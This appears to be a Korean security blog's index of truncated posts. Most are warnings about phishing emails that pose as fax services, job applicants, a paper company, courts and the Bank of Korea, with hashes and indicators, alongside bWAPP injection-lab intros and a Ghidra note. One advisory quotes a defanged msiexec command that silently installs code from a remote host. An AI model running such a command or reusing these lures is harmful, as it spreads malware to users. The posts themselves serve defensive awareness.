태군 코드 : Security, travel & communication

이 도구를 이용하여 허용받지 않은 서비스 대상으로 해킹을 시도하는 행위는 범죄 행위 입니다. 해킹을 시도할 때에 발생하는 법적인 책임은 그것을 행한 사용자에게 있다는 것을 명심하시기 바랍니다. A1 - Server-Side Includes (SSI) Injection SSI(Server-Side Includes)는 웹페이지 내에서 주로 방문자 수를 세거나 홈페이지의 로고를 수정하는 간단한 기능을 추가할 때 사용됩니다. 구분 HTML 문서 SSI가 포함된 HTML 문서 파일 구분(확장자) *.html *.shtml Tag (코드실행) Client에서 Tag 번역 Server(웹서버,Apache)에서 SSI코드번역후 Client(웹브라우즈)로 전송 사용가능코드 html표준태그 웹브라우즈로 결과전송 html표..

발신자 : paraic.hickey@dunbarlunn.com 외 다수 제목 : 서류 첨부파일명 : 1333327437141.xls (숫자 변경) 해당 메일은 본문내용 없이 '삼성 갤럭시 스마트폰에서 보냈습니다.'라는 문구와 숫자로 된 엑셀파일이 첨부되어 있습니다. 첨부된 엑셀 파일을 실행시키면 엑셀창이 뜨면서 '콘텐츠 사용' 이라는 보안경고 창이 활성화 되고 매크로 사용을 유도 하고 있습니다. 보안 경고를 무시하고 '콘텐츠 사용'을 누를경우 매크로를 수행해 외부로 부터 악성코드가 다운로드 됩니다. "msiexec.exe" with commandline "RESTART=AUTO /i hxxp://velquene.net/mshost1 /q ADRESS='%TMP%'" 현재 다수의 백신에서 미탐지 중이며, ..

최근 온라인 팩스 서비스 WiseFax를 사칭하여 악성메일이 유포되고 있어 주의가 필요할것으로 보입니다. 발신자 : admin@eurocoin.info 외 다수제목 : 팩스가 전송되었습니다.첨부파일 : WiseFax 문서.rar 해당 메일은 '팩스가 전송되었습니다.'란 제목과 'WiseFax 문서.rar' 파일을 함께 첨부하고 있으며, 본 서류를 보기 위해서는 MS워드가 필요하다는 내용을 담고 있습니다. 실제 해당 첨부파일을 확인해보면 doc 파일을 위장한 실행파일이 담겨져 있습니다. WiseFax는 실제로 존재하고 있는 온라인 팩스 어플리케이션으로 공격자들은 실제 존재하는 제품을 사칭해 사용자들을 안심시킨뒤 첨부파일 실행을 유도하고 있습니다. 최근 유포되고 있는 악성메일들의 유형을 보면 지속적으로 변화..

미국 NSA가 내부적으로 개발하고 사용했던 리버스 엔지니어링 툴인 기드라(Ghidra)가 소스코드까지 공개가 되었습니다. 공개가 된지는 조금되었지만... 기드라는 리버스 엔지니어링 프레임워크로 NSA 보안 연구 부서에서 개발한 툴들로 구성되어 있으며, 악성코드와 멀웨어를 분석할수 있는 도구 있습니다. 현재 윈도우, 맥, 리눅스 등 다양한 OS에서 호환이 됩니다. 현재 IDA 디버깅 툴을 너무 비싸서 사용을 못하지만, IDA를 대체할수 있는게 Ghidra라고 조심스럽게 생각해 봅니다. 기드라(Ghidra) 다운로드 해당 사이트에 가시면 기드라를 다운로드 받을수 있으며 보다 자세한 정보가 나와있으니 참고하셔서 한번 사용해보셔도 좋을 것 같습니다.

최근 저작권 위반 및 입사지원서를 위장한 악성 이메일 공격이 증가하고 있으며, 첨부된 파일을 열어보도록 하는 공격이 꾸준이 증가하고 있어 사용자들의 주의가 필요할 것으로 보입니다. 발신자 : 랜덤@naver.com (변경가능)제목 : 안녕하세요 김민지 입니다. (변경가능) 첨부파일명 : 이력서.egg (변경가능) 해당 메일에는 이력서.egg 압축파일을 첨부하고 있으며, 첨부파일 실행을 유도 하고 있습니다. 먼저 의심되는 메일을 확인할수 있는 제일 간단한 방법은 해당파일 오른쪽 버튼을 누른후 압축풀기가 아닌 열기를 선택하여 줍니다. 저는 반디집을 사용하기 때문에 저와 나오는 화면은 다를수 있습니다. 오른쪽 버튼을 누른후 열기를 선택하면 위와 같은 화면이 보이실겁니다. 실제 압축을 풀어서 확인을 할수도 있지..

이 도구를 이용하여 허용받지 않은 서비스 대상으로 해킹을 시도하는 행위는 범죄 행위 입니다. 해킹을 시도할 때에 발생하는 법적인 책임은 그것을 행한 사용자에게 있다는 것을 명심하시기 바랍니다. A1 - PHP Code Injection 비박스 취약점 진단항목 A1 - Injection 항목에 해당하는 PHP Code Injection에 대하여 살펴 보도록 하겠습니다. 비박스 로그인을 하신후 PHP Code Injection을 선택해 주신후 [Hack] 버튼을 눌러 줍니다. PHP Code Injection 페이지에 접속하신후 URL을 확인해 보시면 해당페이지는 'phpi.php' 페이지라는 것을 알수 있으며, 'message'라는 굵은 글씨가 보이실겁니다. 여기서 'message'라는 굵은 글씨를 클릭하..

입사지원서를 사칭한 악성메일이 꾸준히 유포되고 있는 정황이 확인이 되므로, 인사지원 담당자 분들과 사용자들의 주의가 필요할 것으로 보입니다. 발신자 : jangdy0218@giropartpriateloops.top 제목 : 안녕하세요 열정을 가지고 열심히하겠습니다(장다연) 첨부파일 : 이력서.alz 발신자 : jangdy0218@giropartpriateloops.xyz 제목 : [장도연] 입사지원서_0410 첨부파일 : 장도연.rar 발신자 : killerdiedie@naver.com 제목 : 안녕하세요 연락드려봅니다 첨부파일 : 이력서.egg 메일 본문내용은 이력서를 보내드리니 확인해 달라는 내용이 포함되어 있으며, 첨부파일은 다양한 형태의 압축 파일로 이루어져 있습니다. 압축된 첨부파일을 확인해 보..

최근 한솔제지를 사칭한 신종 랜섬웨어가 유포되고 있는 정황이 확인 되었습니다. 발신자 : penny@amerathon.com 외 다수 제목 : 한솔제지(주) 발주서 송부 첨부파일명 : 구매오더4500286249.xls 파일해시값 dccf4808f742270c24b709f8813d02e2d39a645bb852306e9ef5eae0bd52554e 메일에는 구매오더4500286249.xls 첨부파일이 포함되어 있습니다. 해당 파일을 실행시킬 경우 악성매크로 허용을 유도 하고 있으며, 매크로 실행시 202.168.154.158 접속후 임시폴더에 lib1 이라는 악성파일을 다운로드 받습니다. 해당파일은 Microsoft Installer 형태를 가지고 있으며, 윈도우 정상 인스톨러 msiexec.exe를 통해 해..

법원을 사칭하여 악성메일이 유포되고 있어 주의가 필요할 것으로 보입니다. 발신자 : news@tracking-time.com 외 다수 제목 : 판례 #558 019 327 첨부파일명 : Emblem_of_Korean_Courts.svg.png 법원 통지서.rar 파일 해시값1766422b2ccfd9123af4de59af958a2fefd97261c64dc8b07d1729f80f6d9506 메일을 보시면 법원 통지서.rar 이라는 첨부파일을 포함하고 있으며, 메일 본문에는 헌법 재판소에 출두하라는 내용이 포함되어 있습니다. 첨부파일은 doc 문서파일을 위장을 하고 있지만 실제 exe 실행 파일이라는 것을 알수 있습니다. 바이러스토탈 확인결과 해당 파일에 대하여 백신에서 탐지 비율이 낮으므로 더욱더 주의가 필..

한국 은행을 사칭한 악성 메일이 유포되고 있는 정황이 확인 되었습니다. 발신자 : koreasecurity.top메일 제목 : 한국은행 - 귀하의 계정은 냉동첨부파일 : 1551187296875.png 한국은행 교육.zip 메일 내용을 확인해 보면 계정이 잠겼다는 내용이 포함되어 있으며, 본문 내용이 부자연 스러운 걸로 보아 번역기를 사용하여 한국어로 맞춘 것으로 추정이 됩니다. 첨부파일을 확인해 보면 pdf파일로 위장한 실행 파일이 존재하고 있습니다. 실제 첨부된 파일의 속성을 보시면 파일 형식은 응용 프로그램(.exe) 파일인것을 알수 있습니다. SHA256 : 5779ac983363d70157bdf4962d07ec5e5a10be037bbb25506882127de964795d 현재 해당 파일은 다수의..